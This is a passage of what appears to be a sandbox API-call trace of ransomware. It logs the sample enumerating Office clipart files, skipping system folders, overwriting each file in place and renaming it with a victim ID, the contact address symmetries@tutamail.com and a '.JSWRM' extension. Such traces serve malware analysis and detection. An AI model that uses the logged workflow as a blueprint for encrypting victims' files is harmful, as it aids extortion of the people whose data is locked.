lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.024] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3016) returned 1 [0075.024] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbc0) returned 0x24c1d0 [0075.024] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xbc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xbc0, lpOverlapped=0x0) returned 1 [0075.025] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.026] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xbc0, lpOverlapped=0x0) returned 1 [0075.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.026] CloseHandle (hObject=0x460) returned 1 [0075.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0075.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0075.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0075.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0075.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0075.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.026] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0075.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.027] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00273_.WMF", cAlternateFileName="")) returned 1 [0075.027] lstrcmpiW (lpString1="BL00273_.WMF", lpString2=".") returned 1 [0075.027] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="..") returned 1 [0075.027] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="...") returned 1 [0075.027] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="windows") returned -1 [0075.027] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="recovery") returned -1 [0075.027] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="perflogs") returned -1 [0075.027] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="documents and settings") returned -1 [0075.027] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.027] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="system volume information") returned -1 [0075.027] lstrcmpiW (lpString1="BL00273_.WMF", lpString2="msocache") returned -1 [0075.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0075.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00273_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00273_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00273_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0075.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0075.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00273_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00273_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00273_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0075.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.028] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3780) returned 1 [0075.028] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xec0) returned 0x24c1d0 [0075.028] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xec0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xec0, lpOverlapped=0x0) returned 1 [0075.030] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.030] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xec0, lpOverlapped=0x0) returned 1 [0075.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.030] CloseHandle (hObject=0x460) returned 1 [0075.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0075.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0075.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0075.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0075.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0075.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.030] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0075.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.031] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1044, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00274_.WMF", cAlternateFileName="")) returned 1 [0075.031] lstrcmpiW (lpString1="BL00274_.WMF", lpString2=".") returned 1 [0075.031] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="..") returned 1 [0075.031] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="...") returned 1 [0075.031] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="windows") returned -1 [0075.031] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="recovery") returned -1 [0075.031] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="perflogs") returned -1 [0075.032] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="documents and settings") returned -1 [0075.032] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.032] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="system volume information") returned -1 [0075.032] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="msocache") returned -1 [0075.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0075.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00274_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00274_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00274_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0075.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0075.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00274_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00274_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00274_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0075.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.032] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4164) returned 1 [0075.032] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1040) returned 0x24c1d0 [0075.032] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1040, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1040, lpOverlapped=0x0) returned 1 [0075.064] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.064] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1040, lpOverlapped=0x0) returned 1 [0075.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.064] CloseHandle (hObject=0x460) returned 1 [0075.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0075.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0075.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0075.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0075.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0075.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.065] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0075.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.065] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00296_.WMF", cAlternateFileName="")) returned 1 [0075.065] lstrcmpiW (lpString1="BL00296_.WMF", lpString2=".") returned 1 [0075.065] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="..") returned 1 [0075.065] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="...") returned 1 [0075.066] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="windows") returned -1 [0075.066] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="recovery") returned -1 [0075.066] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="perflogs") returned -1 [0075.066] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="documents and settings") returned -1 [0075.066] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.066] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="system volume information") returned -1 [0075.066] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="msocache") returned -1 [0075.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0075.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00296_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00296_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00296_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0075.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00296_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00296_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00296_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.066] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0075.066] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x320) returned 0x203550 [0075.066] ReadFile (in: hFile=0x460, lpBuffer=0x203550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0075.068] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.068] WriteFile (in: hFile=0x460, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0075.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: 